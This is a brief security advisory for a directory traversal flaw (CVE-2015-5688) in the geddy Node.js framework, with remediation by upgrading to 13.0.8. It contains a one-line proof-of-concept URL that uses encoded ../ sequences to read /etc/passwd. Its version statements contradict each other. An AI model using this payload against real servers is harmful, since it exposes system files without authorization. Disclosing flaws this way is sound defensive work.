Directory Traversal

Module: geddy

Published: July 27th, 2015

Reported by: Vikram Chaitanya

CVE-2015-5688

CWE-22

Vulnerable: <13.0.8
Patched: >=13.0.8

Overview

Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.

Proof of Concept

http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Remediation

Update geddy to version >= 13.0.8

References